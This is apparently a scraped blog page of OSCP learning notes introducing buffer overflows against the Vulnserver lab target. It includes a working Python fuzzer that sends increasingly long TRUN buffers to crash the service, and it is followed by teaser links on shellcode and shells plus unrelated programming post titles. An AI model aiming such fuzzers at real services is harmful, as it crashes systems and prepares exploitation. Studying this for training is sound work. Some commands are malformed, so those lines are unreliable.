Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

OSCP Learning Notes - Buffer Overflows(1)的更多相关文章

  1. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  2. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  3. OSCP Learning Notes - Buffer Overflows(5)

    Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of K ...

  4. OSCP Learning Notes - Buffer Overflows(4)

    Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Downl ...

  5. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  6. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  9. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

随机推荐

  1. 使用vscode 开发go项目的最新姿势. go版本1.14.2

    使用了go 1.14.2. 版本, 再也不用建src, pkg, bin 目录了,   以及再也不用强制配置GOPATH了 前提条件: 必须是 go mod 项目. 在工程目录下, 执行这样的命令生成 ...

  2. 【asp.net core 系列】13 Identity 身份验证入门

    0. 前言 通过前两篇我们实现了如何在Service层如何访问数据,以及如何运用简单的加密算法对数据加密.这一篇我们将探索如何实现asp.net core的身份验证. 1. 身份验证 asp.net ...

  3. js的原型和原型链

    总结: 1.每一个函数都有一个prototype属性,默认指向object空对象(原型对象), 每一个原型对象都有一个constructor属性,指向函数对象. eg: Person函数:     P ...

  4. ImageLoader在Gridview中的使用

    原理和ImageLoader在Listview中的使用一样,只有下面的几点变化 主页面的布局 <?xml version="1.0" encoding="utf-8 ...

  5. mybatis视频教程2-动态参数

    /MyBatis_04_DynamicSQL/src/com/atguigu/mybatis/dao/EmployeeMapperDynamicSQL.java package com.atguigu ...

  6. 一个工作了四年的java程序员的心得体会

    年底了,该给自己写点总结了!从毕业到现在已经快4年啦,一直在Java的WEB开发行业混迹.我不是牛人,但是自我感觉还算是个合格的程序员,有必要写下自己将近4年来的经历,给自我以提示,给刚入行的朋友提供 ...

  7. 微信小程序 wx:if 多条件判断

    <view wx:if="{{a}}">单个条件</view> <view wx:if="{{a || b}}">多个或条件 ...

  8. Flask-install-python2.6

    命令: # 安装virtualenv $ sudo yum install python-setuptools $ sudo easy_install virtualenv OR sudo pip i ...

  9. 入门大数据---Kafka生产者详解

    一.生产者发送消息的过程 首先介绍一下 Kafka 生产者发送消息的过程: Kafka 会将发送消息包装为 ProducerRecord 对象, ProducerRecord 对象包含了目标主题和要发 ...

  10. Java多线程之synchronized详解

    目录 synchronized简介 同步的原理 对象头与锁的实现 锁的优化与升级 Monitor Record 锁的对比 synchronized简介 synchronized关键字,一般称之为&qu ...